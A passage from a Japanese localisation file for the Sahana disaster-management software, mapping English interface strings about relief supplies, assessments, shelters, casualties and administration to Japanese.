'Add Membership': 'メンバシップを追加',
'Add Message': 'メッセージを追加',
'Add Need Type': '需要タイプを追加',
'Add Need': '要求を追加',
'Add New Aid Request': '援助要請を新規追加',
'Add New Assessment Summary': '新規アセスメントの要約を追加',
'Add New Baseline Type': '基準値タイプの新規追加',
'Add New Baseline': '新しい基準値を追加',
'Add New Bin Type': 'Bin Typeを新規追加',
'Add New Bin': 'Binを新規追加',
'Add New Budget': '予算を新規追加',
'Add New Bundle': 'Bundleを新規追加',
'Add New Cluster Subsector': 'クラスタのサブセクタを新規作成',
'Add New Cluster': 'クラスタを新規追加',
'Add New Commitment Item': '物資コミットメントを新規追加',
'Add New Config': '設定を新規追加',
'Add New Distribution Item': '配給物資を新規追加',
'Add New Distribution': '配給所を新規追加',
'Add New Document': '文書を新規追加',
'Add New Donor': '資金提供組織を新規追加',
'Add New Entry': 'エントリを新規追加',
'Add New Flood Report': '洪水情報を新規追加',
'Add New Image': '画像を新規追加',
'Add New Impact Type': '災害影響のタイプを新規追加',
'Add New Impact': '新規影響を追加',
'Add New Inventory Item': '備蓄物資を新規追加',
'Add New Inventory Store': '物資集積場所を新規追加',
'Add New Item Catalog Category': '物資カタログカテゴリを新規追加',
'Add New Item Catalog': '物資カタログを新規追加',
'Add New Item Sub-Category': '物資サブカテゴリを新規追加',
'Add New Item to Kit': 'キットに救援物資を新規追加',
'Add New Key': 'Keyを新規追加',
'Add New Level 1 Assessment': 'レベル1アセスメントを新規追加',
'Add New Level 2 Assessment': 'レベル2アセスメントを新規追加',
'Add New Member': 'メンバを新規追加',
'Add New Membership': 'メンバシップを新規追加',
'Add New Metadata': 'メタデータを新規追加',
'Add New Need Type': '需要タイプを新規追加',
'Add New Need': '新しい要求を登録する',
'Add New Note': '追加情報を新規追加',
'Add New Peer': 'データ同期先を新規追加',
'Add New Position': '場所を新規追加',
'Add New Problem': '問題を新規追加',
'Add New Rapid Assessment': '被災地の現況アセスメントを新規追加',
'Add New Received Item': '受領した物資を新規追加',
'Add New Record': 'レコードを新規追加',
'Add New Request Item': '特定物資の要請を新規追加',
'Add New Request': '支援要請を新規追加',
'Add New Response': '支援要請を新規追加',
'Add New River': '河川情報を新規追加',
'Add New Role to User': 'ユーザに役割を新規割り当て',
'Add New Sent Item': '送った物資の追加',
'Add New Setting': '設定を新規追加',
'Add New Shipment to Send': '発送する輸送物資を新規追加',
'Add New Site': 'Siteを新規追加',
'Add New Solution': '解決案を提示する',
'Add New Staff Type': 'スタッフタイプを新規追加',
'Add New Staff': 'スタッフを新規追加',
'Add New Storage Location': '備蓄場所を新規追加',
'Add New Survey Answer': '新しい調査の回答を追加しました',
'Add New Survey Question': '調査項目を新規追加',
'Add New Survey Section': '新しい調査セクションを追加',
'Add New Survey Series': '新しい一連の調査を追加します',
'Add New Survey Template': 'Survey Templateを新規追加',
'Add New Team': 'チームを新規追加',
'Add New Ticket': 'チケットを新規追加',
'Add New Track': '追跡情報を新規追加',
'Add New Unit': '単位を新規追加',
'Add New User to Role': '新規ユーザに役割を割り当て',
'Add New Warehouse Item': '倉庫物資を新規追加',
'Add New': '新規追加',
'Add Note': 'ノートを追加',
'Add Peer': 'データ同期先を追加',
'Add Performance Evaluation': 'パフォーマンス評価を追加',
'Add Person': '人物情報を追加',
'Add Photo': '写真を追加',
'Add Point': 'ポイントを追加',
'Add Polygon': 'Polygonを追加',
'Add Position': '場所を追加',
'Add Problem': '問題を追加',
'Add Projections': '地図投影法を追加',
'Add Question': '質問事項を追加',
'Add Rapid Assessment': '被災地の現況アセスメントを追加',
'Add Rapid Evaluation': '迅速評価を追加',
'Add Recipient Site': '受け取りSiteを追加',
'Add Recipient': '受け取り担当者を追加',
'Add Record': 'レコードを追加',
'Add Recovery Report': '遺体回収レポートを追加',
'Add Reference Document': 'リファレンス文書を追加',
'Add Report': 'レポートを追加',
'Add Request Detail': '支援要請の詳細を追加',
'Add Request Item': '物資の要請を追加します',
'Add Request': '支援要請を追加',
'Add Response': '返答を追加',
'Add Section': 'Sectionを追加',
'Add Sender Organization': '送付元団体を追加',
'Add Sender Site': '送付元Siteを追加',
'Add Setting': '設定を追加',
'Add Shipment Transit Log': '輸送履歴を追加',
'Add Shipment/Way Bills': '輸送費/渡航費を追加',
'Add Site': 'サイトを追加',
'Add Skill Types': 'スキルタイプを追加',
'Add Solution': '解決案を追加',
'Add Staff Type': 'スタッフタイプを追加',
'Add Staff': 'スタッフを追加',
'Add Storage Bin ': 'Storage Binを追加 ',
'Add Storage Bin Type': 'Storage Bin Typeを追加',
'Add Storage Location': '備蓄地点を追加',
'Add Sub-Category': 'サブカテゴリを追加',
'Add Subscription': '寄付金情報を追加',
'Add Survey Answer': '調査の回答を追加',
'Add Survey Question': '聞き取り調査項目を追加',
'Add Survey Section': '調査セクションの追加',
'Add Survey Series': '一連の調査を追加',
'Add Survey Template': '調査テンプレートを追加',
'Add Team Member': 'メンバを追加',
'Add Team': 'チームを追加',
'Add Ticket': 'チケットを追加',
'Add Unit': '単位を追加',
'Add Volunteer Registration': 'ボランティア登録を追加',
'Add Warehouse Item': '倉庫物資を追加',
'Add a Reference Document such as a file, URL or contact person to verify this data. If you do not enter a Reference Document, your email will be displayed instead.': 'ファイル、URL、あるいは、このデータの確認を行なう連絡先のような参照文書を追加します。参照文書を入力しない場合、代わりにあなたのメールが表示されます。',
'Add a Volunteer': 'ボランティアの追加',
'Add a new Relief Item.': '救援物資を新規追加',
'Add a new Site from where the Item is being sent.': 'この救援物資の送付元サイトを新規追加',
'Add a new Site where the Item is being sent to.': 'この物資の送付先サイトを新規追加',
'Add an Photo.': '写真を追加.',
'Add location': 'ロケーションを追加',
'Add main Item Category.': '主要なアイテムカテゴリを追加',
'Add main Item Sub-Category.': '主要な救援物資サブカテゴリを追加',
'Add new Group': 'グループを新規追加',
'Add new Individual': '個人を新規追加',
'Add new position.': '新しいポジションを追加してください。',
'Add new project.': 'プロジェクトを新規追加',
'Add new staff role.': 'スタッフの権限を新規追加',
'Add or Update': '追加、あるいは更新',
'Add the Storage Bin Type.': 'Storage Binタイプを追加します。',
'Add the Storage Location where this bin is located.': 'binが保存されている貯蔵場所を追加します。',
'Add the Storage Location where this this Bin belongs to.': 'このBinがある備蓄地点を追加します。',
'Add the main Warehouse/Site information where this Bin belongs to.': 'その物資の備蓄スペースとなっている倉庫/サイトの情報を追加してください。',
'Add the main Warehouse/Site information where this Item is to be added.': 'この物資が追加されることになっている主要な倉庫 / サイトの情報を追加してください。',
'Add the main Warehouse/Site information where this Storage location is.': 'その物資の備蓄場所となっている倉庫/サイトの情報を追加してください。',
'Add the unit of measure if it doesnt exists already.': '距離単位が未登録の場合、単位を追加します。',
'Add to Bundle': 'Bundleへの登録',
'Add to Catalog': 'カタログへ登録',
'Add to budget': '予算項目へ登録',
'Add': '追加',
'Add/Edit/Remove Layers': 'レイヤを追加/編集/削除',
'Added to Group': 'メンバシップを追加しました',
'Added to Team': 'メンバシップを追加しました',
'Additional Beds / 24hrs': '追加ベッド予測数 / 24h',
'Additional Comments': '追加コメント',
'Additional quantity quantifier – i.e. “4x5”.': '数量を表す追記(例 「4x5」)',
'Address Details': '住所情報の詳細',
'Address Type': '住所情報タイプ',
'Address added': '住所情報を追加しました',
'Address deleted': '住所情報を削除しました',
'Address updated': '住所情報を更新しました',
'Address': '住所情報',
'Addresses': '住所',
'Adequate food and water available': '適切な量の食料と水が供給されている',
'Adequate': '適正',
'Adjust Item(s) Quantity': 'アイテム量の修正',
'Adjust Items due to Theft/Loss': 'アイテム量の修正(盗難/紛失のため)',
'Admin Email': '管理者の電子メール',
'Admin Name': '管理者名',
'Admin Tel': '管理者の電話番号',
'Admin': '管理者',
'Administration': '管理',
'Administrator': '管理者',
'Admissions/24hrs': '患者増加数/24h',
'Adolescent (12-20)': '青年(12-20)',
'Adolescent participating in coping activities': '未成年が災害対応に従事',
'Adult (21-50)': '成人(21-50)',
'Adult ICU': '成人 ICU',
'Adult Psychiatric': '精神病の成人',
'Adult female': '成人女性',
'Adult male': '成人男性',
'Adults in prisons': '刑務所で服役中の成人がいる',
'Advanced Bin Search': 'Binの詳細検索',
'Advanced Catalog Search': 'カタログの詳細検索',
'Advanced Category Search': '詳細カテゴリー検索',
'Advanced Item Search': '詳細な物資検索',
'Advanced Location Search': '詳細な位置検索',
'Advanced Site Search': 'Siteの詳細検索',
'Advanced Sub-Category Search': 'サブカテゴリの詳細検索',
'Advanced Unit Search': '高度な単位検索',
'Advanced': '詳細',
'Advanced:': 'もっと正確に:',
'Advisory': '注意喚起',
'After clicking on the button, a set of paired items will be shown one by one. Please select the one solution from each pair that you prefer over the other.': 'このボタンをクリックすると、解決法のペアが順に表示されます。各ペアから、最も適する項目を1つずつ選択してください。',
'Age Group': '年齢グループ',
'Age group does not match actual age.': '年齢グループが実際の年齢と一致しません。',
'Age group': '年齢グループ',
'Aggravating factors': '悪化要因',
'Aggregate Items': 'アイテムの集約',
'Agriculture': '農業',
'Aid Request Details': '援助要請の詳細',
'Aid Request added': '援助要請を追加しました',
'Aid Request deleted': '援助要請を削除しました',
'Aid Request updated': '援助要請を更新しました',
'Aid Request': '治療要請',
'Aid Requests': '援助要請',
'Air Transport Service': '物資空輸サービス',
'Aircraft Crash': '飛行機事故',
'Aircraft Hijacking': '航空機ハイジャック',
'Airport Closure': '空港閉鎖',
'Airspace Closure': '離陸地点閉鎖',
'Alcohol': 'アルコール',
'Alert': 'アラート',
'All Inbound & Outbound Messages are stored here': '送受信した全てのメッセージはここに格納されます。',
'All Locations': '全てのロケーション',
'All Records': 'すべてのレコード',
'All Requested Items': '物資要請一覧',
'All Resources': 'すべての資源',
'All data provided by the Sahana Software Foundation from this site is licenced under a Creative Commons Attribution licence. However, not all data originates here. Please consult the source field of each entry.': 'このサイトのSahana Software Foundationで提供されるデータのライセンスは、CCA (Creative Commons Attribution licence)となります。しかし、すべてのデータの発生源が、このサイトであるとは限りません。詳細は、各エントリの情報ソースの項目に記載されています。',
'All': '全て',
'Allowed to push': 'プッシュが許可済みである',
'Allows a Budget to be drawn up': '予算の策定を行ないます',
'Allows authorized users to control which layers are available to the situation map.': '認証済みユーザーが「状況地図のどのレイヤが利用できるか」を制御することを許可します。',
'Alternative Item Details': '代わりの品物についての詳細',
'Alternative Item added': '代わりの物資を追加しました',
'Alternative Item deleted': '代わりの品物が削除されました',
'Alternative Item updated': '代わりの物資を更新しました',
'Alternative Item': '代わりの物資',
'Alternative Items': '代わりとなる物資',
'Alternative infant nutrition in use': '利用中の乳児用代替食',
'Alternative places for studying available': '学校以外の場所を学習に利用可能である',
'Alternative places for studying': '授業開設に利用可能な施設',
'Ambulance Service': '救急サービス',
'An Inventory Store is a physical place which contains Relief Items available to be Distributed.': '物資集積場所とは、救援物資の配給能力をもつ、物理的な場所を指します。',
'An intake system, a warehouse management system, commodity tracking, supply chain management, procurement and other asset and resource management capabilities.': '物資の受け入れ、貯蔵設備の管理、必要な物資の記録、サプライチェーン・マネジメント、調達、その他様々な資産やリソースの管理といった機能。',
'An item which can be used in place of another item': '他の物資の代わりに使う物資',
'Analysis of Completed Surveys': '完了したフィードバックの分析',
'Animal Die Off': '動物の死',
'Animal Feed': '動物のエサ',
'Animals': '動物',
'Answer Choices (One Per Line)': '選択肢(一行に一つ)',
'Anthropology': '人類学',
'Antibiotics available': '抗生物質が利用可能',
'Antibiotics needed per 24h': '24時間ごとに必要な抗生物質',
'Any available Metadata in the files will be read automatically, such as Timestamp, Author, Latitude & Longitude.': 'ファイル内の利用可能なすべてのメタデータ(タイムスタンプ、作成者、緯度経度等)を自動的に読み込みます。',
'Any comments about this sync partner.': 'データの同期先に関するコメント',
'Apparent Age': '年齢(外見)',
'Apparent Gender': '性別(外見)',
'Application Permissions': 'アプリケーションに対する権限',
'Application': '申請',
'Applications': 'アプリケーション',
'Appropriate clothing available': '適切な衣料が利用可能である',
'Appropriate cooking equipment/materials in HH': '世帯内にて適切な調理器具/食材が利用可能である',
'Approved': '承認されました',
'Approver': '承認者',
'Approx. number of cases/48h': '事象の発生概数/48h',
'Approximately how many children under 5 with diarrhea in the past 48 hours?': '過去48時間以内に発生した、5歳未満小児の下痢症状発生件数を記載してください。概数でかまいません',
'Archive not Delete': '削除せずアーカイブする',
'Arctic Outflow': '北極気団の南下',
'Are basic medical supplies available for health services since the disaster?': '災害発生後、基本的な医療行為を行えるよう、ヘルスサービスに対して供給があったかどうかを記載します',
'Are breast milk substitutes being used here since the disaster?': '災害発生後、母乳代替品が使われているかどうかを記載します',
'Are the areas that children, older people, and people with disabilities live in, play in and walk through on a daily basis physically safe?': '日中時間帯、この地域での生活や遊び、通行によって、未成年や高齢者、障碍者に肉体的な危害が及ぶ可能性があるかを記載します',
'Are the chronically ill receiving sufficient care and assistance?': '慢性病の罹患者に対して、十分なケアと介護が行われているかを記載します',
'Are there adults living in prisons in this area?': 'この地域で刑務所に収容されている成人がいるかどうかを記載してください',
'Are there alternative places for studying?': '学校以外に学習を行える場所があるかどうかを記載してください',
'Are there cases of diarrhea among children under the age of 5?': '5歳未満の幼児に下痢症状が発生しているかどうかを記載してください',
'Are there children living in adult prisons in this area?': 'この地域で、成人用刑務所に収容されている未成年がいるかどうかを記載してください',
'Are there children living in boarding schools in this area?': 'この地域で、寄宿舎に居住している未成年がいるかどうかを記載してください',
'Are there children living in homes for disabled children in this area?': 'この地域で、障がい児施設に居住している未成年がいるかどうかを記載してください',
'Are there children living in juvenile detention in this area?': 'この地域で、少年院に収容されている未成年がいるかどうかを記載してください',
'Are there children living in orphanages in this area?': 'この地域で、孤児院に居住している未成年がいるかどうかを記載してください',
'Are there children with chronical illnesses in your community?': '慢性疾患をもった子どもが共同体の中にいるかどうかを記載してください',
'Are there health services functioning for the community since the disaster?': '災害発生後、共同体で医療サービスが機能しているかどうかを記載してください',
'Are there older people living in care homes in this area?': 'この地域で、介護施設に居住している高齢者がいるかどうかを記載してください',
'Are there older people with chronical illnesses in your community?': 'この共同体のなかで、慢性疾患を患っている高齢者がいるかどうかを記載してください',
'Are there people with chronical illnesses in your community?': 'この共同体の中で、慢性疾患を患っている人物がいるかどうかを記載してください',
'Are there separate latrines for women and men available?': 'トイレが男女別になっているかどうかを記載してください',
'Are there staff present and caring for the residents in these institutions?': 'これら施設の居住者に対して、ケアと介護を行えるスタッフが存在するかどうかを記載してください',
'Area': 'エリア',
'Areas inspected': '調査済み地域',
'Assessment Details': 'アセスメントの詳細',
'Assessment Reported': 'アセスメントを報告しました',
'Assessment Summaries': 'アセスメントの要約',
'Assessment Summary Details': 'アセスメント要約の詳細',
'Assessment Summary added': 'アセスメントの要約を追加しました',
'Assessment Summary deleted': 'アセスメントの要約を削除しました',
'Assessment Summary updated': 'アセスメントの要約を更新しました',
'Assessment Type': 'アセスメントタイプ',
'Assessment added': 'アセスメントを追加しました',
'Assessment admin level': 'アセスメントの管理レベル',
'Assessment and Activities Gap Analysis Map': 'アセスメントと活動のギャップについての解析マップ',
'Assessment and Activities Gap Analysis Report': 'アセスメントと支援活動のギャップ解析レポート',
'Assessment deleted': 'アセスメントを削除しました',
'Assessment timeline': 'アセスメントタイムライン',
'Assessment updated': 'アセスメントを更新しました',
'Assessment': 'アセスメント',
'Assessments Needs vs. Activities': '需要アセスメントと支援活動のギャップ',
'Assessments and Activities': 'アセスメントと支援活動',
'Assessments are shown as green, yellow, orange, red.': 'アセスメントは、緑・黄・オレンジ・赤のいずれかの色で表されます。',
'Assessments are structured reports done by Professional Organizations - data includes WFP Assessments': 'アセスメントとは、専門団体によって作成された調査文書のことを指します。データには、WFP(国連世界食糧計画)アセスメントも含まれます',
'Assessments are structured reports done by Professional Organizations': 'アセスメントとは、専門団体によって作成された調査文書のことを指します。',
'Assessments': 'アセスメント',
'Assessments:': 'アセスメント:',
'Assessor': '査定実施者',
'Asset Assigned': '資産割り当て',
'Asset Assignment Details': '資産割り当ての詳細',
'Asset Assignments deleted': '資産の割り当てを削除しました',
'Asset Assignments updated': '資産割り当てを更新しました',
'Asset Assignments': '資産割り当て',
'Asset Details': '資産の詳細',
'Asset Management': '資産管理',
'Asset Number': '資産番号',
'Asset added': '資産を追加しました',
'Asset deleted': '資産を削除しました',
'Asset updated': '資産を更新しました',
'Asset': '資産',
'Assets': '資産',
'Assign Asset': '資産割り当て',
'Assign Storage Location': '蓄積地点の割り当て',
'Assign to Org.': '組織に割り当て',
'Assigned To': '担当者',
'Assigned to': '担当者',
'Assigned': '割り当てられた',
'Assignments': '割り当て',
'Assistance for immediate repair/reconstruction of houses': '緊急の修理/家屋復旧の手伝い',
'Assistant': 'アシスタント',
'At/Visited Location (not virtual)': '実際に訪問した/訪問中のロケーション',
'Attend to information sources as described in <instruction>': '<instruction>に記載されている情報ソースに注意を払う',
'Attribution': '属性',
'Audit Read': '監査報告書の読み込み',
'Audit Write': '監査報告書の書き込み',
'Author': '作者',
'Automotive': '車両',
'Availability': 'ボランティア期間',
'Available Alternative Inventory Items': '利用可能な他の物資',
'Available Beds': '利用可能なベッド数',
'Available Inventory Items': '利用可能な倉庫内の物資',
'Available Messages': '利用可能なメッセージ',
'Available Records': '利用可能なレコード',
'Available databases and tables': '利用可能なデータベースおよびテーブル',
'Available for Location': '活動可能な地域',
'Available from': 'ボランティア開始日',
'Available in Viewer?': 'ビューワ内で利用可能?',
'Available until': 'ボランティア終了日',
'Availablity': '活動期間',
'Avalanche': '雪崩',
'Avoid the subject event as per the <instruction>': '<instruction>に従って対象の事象を避ける',
'Babies who are not being breastfed, what are they being fed on?': '乳児に対して母乳が与えられない場合、どうやって乳幼児の食事を確保しますか?',
'Baby And Child Care': '乳幼児へのケア',
'Background Color for Text blocks': 'テキストブロックの背景色',
'Background Color': '背景色',
'Bahai': 'バハイ',
'Baldness': '禿部',
'Balochi': 'バロチ語',
'Banana': 'バナナ',
'Bank/micro finance': '銀行/マイクロファイナンス',
'Barricades are needed': 'バリケードが必要',
'Base Layer?': '基本レイヤ?',
'Base Layers': '基本レイヤ',
'Base Location': '基本となるロケーション',
'Base Unit': '基本単位',
'Baseline Number of Beds': '平常時のベッド設置数',
'Baseline Type Details': '基準値タイプの詳細',
'Baseline Type added': '基準値タイプを追加しました',
'Baseline Type deleted': '基準値のタイプを削除しました',
'Baseline Type updated': '基準値タイプを更新しました',
'Baseline Type': '基準値タイプ',
'Baseline Types': '基準値の種類',
'Baseline added': '基準値を追加しました',
'Baseline deleted': '基準値を削除しました',
'Baseline number of beds of that type in this unit.': 'この施設における、通常状態のベッド収容数です。',
'Baseline updated': '基準値を更新しました',
'Baselines Details': '基準値の詳細',
'Baselines': '基準値',
'Basic Assess.': '基本アセスメント',
'Basic Assessment Reported': 'ベーシック・アセスメントを報告しました',
'Basic Assessment': '基本アセスメント',
'Basic Details': '基本情報',
'Basic information on the requests and donations, such as category, the units, contact details and the status.': '支援要請と寄付に関する基本情報です。カテゴリ、単位、連絡先詳細および状態等が記載されています。',
'Basic medical supplies available prior to disaster': '災害発生以前 基本的な医療行為の提供',
'Basic medical supplies available since disaster': '災害発生後 基本的な医療行為の提供',
'Basic reports on the Shelter and drill-down by region': '避難所の基本レポートと、地域による絞り込み',
'Basic': '基本',
'Baud rate to use for your modem - The default is safe for most cases': 'モデムを使用するためのボーレートです。大抵の場合はデフォルトが安全です。',
'Baud': 'ボー値',
'Beam': '梁',
'Bed Capacity per Unit': '施設ごとのベッド最大収容数',
'Bed Capacity': 'ベッド最大収容数',
'Bed Type': 'ベッド種別',
'Bed type already registered': 'ベッドのタイプは既に登録済みです。',
'Bedding materials available': '寝具が利用可能である',
'Below ground level': '地下',
'Beneficiary Type': '受益者タイプ',
'Biological Hazard': '生物災害',
'Biscuits': 'ビスケット',
'Blizzard': '吹雪',
'Blood Type (AB0)': '血液型 (AB0式)',
'Blowing Snow': '地吹雪',
'Boat': 'ボート',
'Bodies found': '未回収の遺体',
'Bodies recovered': '回収済みの遺体',
'Body Recovery Reports': '遺体回収レポート',
'Body Recovery Request': '遺体回収の要請',
'Body Recovery Requests': '遺体回収の要請',
'Body': '本文',
'Bomb Explosion': '爆発が発生',
'Bomb Threat': '爆発の危険性',
'Bomb': '爆発物',
'Border Color for Text blocks': 'テキストブロックの枠色',
'Bounding Box Insets': 'バウンディングボックスの内側余白',
'Bounding Box Size': '領域を指定した枠組みのサイズ',
'Boys 13-18 yrs in affected area': '影響地域内の13-18歳の男子数',
'Boys 13-18 yrs not attending school': '学校に通っていない13-18歳の男子数',
'Boys 6-12 yrs in affected area': '影響地域内の6-12歳の男子数',
'Boys 6-12 yrs not attending school': '学校に通っていない6-12歳の男子数',
'Brand Details': '銘柄の詳細',
'Brand added': '銘柄を追加しました',
'Brand deleted': '銘柄が削除されました',
'Brand updated': '銘柄が更新されました',
'Brand': '銘柄',
'Brands': '銘柄',
'Breast milk substitutes in use since disaster': '災害発生後から母乳代替品を使用している',
'Breast milk substitutes used prior to disaster': '災害前から母乳代替品を使用していた',
'Bricks': 'レンガ',
'Bridge Closed': '橋梁(通行止め)',
'Bucket': 'バケツ',
'Buddhist': '仏教徒',
'Budget Details': '予算の詳細',
'Budget Updated': '予算を更新しました',
'Budget added': '予算を追加しました',
'Budget deleted': '予算を削除しました',
'Budget updated': '予算を更新しました',
'Budget': '予算',
'Budgeting Module': '予算編成モジュール',
'Budgets': '予算編成',
'Buffer': 'バッファ',
'Bug': 'バグ',
'Building Aide': '建設援助',
'Building Assessment': '建物のアセスメント',
'Building Assessments': '建築物アセスメント',
'Building Collapsed': '崩壊した建物',
'Building Name': '建物名',
'Building Safety Assessments': '建物の安全アセスメント',
'Building Short Name/Business Name': '建物の名前 / 会社名',
'Building or storey leaning': '建物または階層が傾いている',
'Built using the Template agreed by a group of NGOs working together as the': '例えばECB等、多くのNGOによって利用されている形式を使っての記録が可能です。',
'Bulk Uploader': 'まとめてアップロード',
'Bundle Contents': '小包の内容',
'Bundle Details': 'Bundleの詳細',
'Bundle Updated': 'バンドルを更新しました',
'Bundle added': 'バンドルを追加しました',
'Bundle deleted': 'バンドルを削除しました',
'Bundle updated': 'バンドル・セットを更新しました',
'Bundle': 'バンドル',
'Bundles': 'バンドル',
'Burn ICU': '熱傷 ICU',
'Burn': '火傷(やけど)',
'Burned/charred': '火傷/炭化',
'Business damaged': 'ビジネスへの損害が発生している',
'By Inventory': '物資の送付元',
'By Person': '人物ごと',
'By Site': 'サイト別',
'By Warehouse': '送付元倉庫',
'CBA Women': 'CBA 女性',
'CN': '貨物運送状',
'CSS file %s not writable - unable to apply theme!': 'CSS ファイル %s が書き込み不可になっているため、テーマを適用することができません。',
'Calculate': '計算',
'Camp Coordination/Management': '仮泊施設間の調整 / 管理',
'Camp': '仮泊施設',
'Can only disable 1 record at a time!': '一度に1つしか無効にできません!',
'Can users register themselves for authenticated login access?': '新規ユーザが、他者の承認なしに自分を新規ユーザとして登録できるか?',
'Cancel Add': '追加を取り消す',
'Cancel Shipment': '輸送をキャンセルする',
'Cancel': 'キャンセル',
'Canceled': 'キャンセル',
'Candidate Matches for Body %s': '遺体 %s に適合する候補者',
'Canned Fish': '魚の缶詰',
'Cannot be empty': '必ず入力してください。',
'Cannot delete whilst there are linked records. Please delete linked records first.': 'リンクされたレコードがあるので削除できません。このレコードよりも先に、リンク先のレコードを削除してください。',
'Cannot disable your own account!': '自分自身のアカウントを無効にする事はできません',
'Capacity (Max Persons)': '収容可能数 (最大人数)',
'Capacity (W x D X H)': '収容可能容積 (W x D X H)',
'Capture Information on Disaster Victim groups (Tourists, Passengers, Families, etc.)': '被災者の個々のグループについて、情報を取得する (ツアー旅行者、滞在者、家族、など)',
'Capture Information on each disaster victim': '被災者情報を個別に把握する',
'Capturing organizational information of a relief organization and all the projects they have in the region': '個々の支援団体と、地域内で実行中の全てのプロジェクトを取得します',
'Capturing the essential services each Volunteer is providing and where': '各ボランティアの居場所と、提供している主要なサービスを取得する',
'Capturing the projects each organization is providing and where': '各団体の所在地と、提供している主要なサービスを取得します',
'Cardiology': '心臓病学',
'Cash available to restart business': '事業再開に必要な資金調達が可能',
'Cassava': 'キャッサバ',
'Casual Labor': '一般労働',
'Casualties': '犠牲者',
'Catalog Item added': '救援物資カタログにアイテムを追加しました',
'Catalog Item deleted': 'カタログアイテムを削除しました',
'Catalog Item updated': '救援物資カタログを更新しました',
'Catalog Item': '救援物資カタログ',
'Catalog Items': '物資カタログ',
'Catalog Name': 'カタログ名',
'Catalog': 'カタログ',
'Category': 'カテゴリ',
'Category<>Sub-Category<>Catalog Relation added': 'Category<>Sub-Category<>Catalog 間の関係を追加しました',
'Category<>Sub-Category<>Catalog Relation deleted': 'Category<>Sub-Category<>Catalog 関係を削除しました',
'Category<>Sub-Category<>Catalog Relation updated': 'Category<>Sub-Category<>Catalog 間の関係を更新しました',
'Category<>Sub-Category<>Catalog Relation': 'Category<>Sub-Category<>Catalog 間の関係',
'Ceilings, light fixtures': '天井、照明あり',
'Central point to record details on People': '被災者や支援者など、関係者情報の集積を行ないます',
'Certificate Status': '認証状態',
'Certification': '有資格者',
'Change Password': 'パスワードの変更',
'Check for errors in the URL, maybe the address was mistyped.': '入力したURLに間違いがないか確認してください。',
'Check if the URL is pointing to a directory instead of a webpage.': 'URLがウェブページではなくディレクトリを指定しているか、確認してください。',
'Check outbox for the message status': '送信箱を調べてメッセージステータスを確認する',
'Check to delete': '削除項目にチェック',
'Check to delete:': '削除項目にチェック:',
'Check': '確認',
'Check-In': 'チェックイン',
'Check-Out': 'チェックアウト',
'Check-in': 'チェックイン',
'Check-out': 'チェックアウト',
'Checklist created': 'チェックリストを作成しました',
'Checklist deleted': 'チェックリストを削除しました',
'Checklist of Operations': '作業項目チェックリスト',
'Checklist updated': 'チェックリストを更新しました',
'Checklist': 'チェックリスト',
'Chemical Hazard': '化学災害',
'Chemical, Biological, Radiological, Nuclear or High-Yield Explosive threat or attack': '兵器による攻撃、脅威(化学兵器、生物兵器、放射能汚染、核兵器、高威力の爆発)',
'Chicken': 'ニワトリ',
'Child (2-11)': '子供 (2-11歳)',
'Child (< 18 yrs)': '子供 (18歳未満)',
'Child Abduction Emergency': '未成年誘拐警報',
'Child headed households (<18 yrs)': '代表者が未成年 (18歳以下)の世帯数',
'Child': '子供',
'Children (2-5 years)': '子供たち (2-5歳)',
'Children (5-15 years)': '子供たち(5-15歳)',
'Children (< 2 years)': '子供たち (2歳未満)',
'Children in adult prisons': '成人用刑務所に未成年がいる',
'Children in boarding schools': '寄宿制学校の児童がいる',
'Children in homes for disabled children': '障がい児施設にいる子ども',
'Children in juvenile detention': '少年院収容者がいる',
'Children in orphanages': '孤児院にいる子ども',
'Children living on their own (without adults)': '未成年のみで自活(成人無し)',
'Children not enrolled in new school': '新しい学校に入学していない子供',
'Children orphaned by the disaster': '被災のため孤児になった子供たち',
'Children separated from their parents/caregivers': '親(または親相当の後見人)とはぐれた子供の数',
'Children that have been sent to safe places': '安全な地域へ疎開済みの子供数',
'Children who have disappeared since the disaster': '災害発生後に行方不明の子供たち',
'Children with chronical illnesses': '慢性疾患をもつ子供がいる',
'Chinese (Taiwan)': '中国語 (台湾繁体字)',
'Cholera Treatment Capability': 'コレラ治療対応能力',
'Cholera Treatment Center': 'コレラ治療センター',
'Cholera Treatment': 'コレラの治療',
'Cholera-Treatment-Center': 'コレラ治療センター',
'Choose a new posting based on the new evaluation and team judgement. Severe conditions affecting the whole building are grounds for an UNSAFE posting. Localised Severe and overall Moderate conditions may require a RESTRICTED USE. Place INSPECTED placard at main entrance. Post all other placards at every significant entrance.': '新規の評価とチームの判定に基づいた新しいポスターを選択してください。建物全体が深刻な状態の場合「危険」を、一部は使える場合「制限あり」です。主要な出入口に「調査済み」プラカードを設置してください。全ての使用可能な出入口には他のプラカードを設置してください。',
'Choose': '選択',
'Choosing Skill and Resources of Volunteers': 'ボランティアのスキルとリソースを選択してください',
'Christian': 'キリスト教徒',
'Church': '教会',
'Circumstances of disappearance, other victims/witnesses who last saw the missing person alive.': '行方不明時の状況や、この人物の生存を最後に確認した人物についての情報を記載してください。',
'Civil Emergency': '市民緊急事態',
'Cladding, glazing': '被覆・外壁、ガラス板',
'Clear Selection': '選択をクリア',
'Click on the link %(url)s to reset your password': 'リンクをクリックしてください %(url)s パスワードのリセット',
'Click on the link %(url)s to verify your email': 'リンクをクリックしてください %(url)s 登録されたメールアドレスに間違いが無いことが確認されます',
'Client IP': 'クライアントIP',
'Clinical Laboratory': '臨床検査',
'Clinical Operations': '診療の人員数',
'Clinical Status': '診療状況',
'Close map': '地図を閉じる',
'Closed': '閉鎖中',
'Closure': '閉鎖・通行止め',
'Clothing': '衣服',
'Cluster Details': 'クラスタの詳細',
'Cluster Distance': 'クラスタ距離',
'Cluster Subsector Details': 'クラスタのサブクラスタの詳細',
'Cluster Subsector added': 'クラスタのサブセクタを追加しました',
'Cluster Subsector deleted': 'クラスタのサブセクタを削除しました',
'Cluster Subsector updated': 'クラスタのサブセクタを更新しました',
'Cluster Subsector': 'クラスタのサブクラスタ',
'Cluster Subsectors': 'クラスタのサブセクタ',
'Cluster Threshold': 'クラスタのしきい値',
'Cluster added': 'クラスタを追加しました',
'Cluster deleted': 'クラスタを削除しました',
'Cluster updated': 'クラスタを更新しました',
'Cluster': 'クラスタ',
'Cluster(s)': 'クラスタ',
'Clusters': 'クラスタ',
'Code': 'プロジェクトコード',
'Cold Wave': '寒波',
'Collapse, partial collapse, off foundation': '全壊、一部損壊、基礎からのずれ',
'Collective center': '収集センター',
'Color for Underline of Subheadings': 'サブヘッダのアンダーラインの色',
'Color of Buttons when hovering': 'ホバー時のボタンの色',
'Color of bottom of Buttons when not pressed': '押されなかった時のボタンの下部の色',
'Color of bottom of Buttons when pressed': 'ボタン押下時の下部の色',
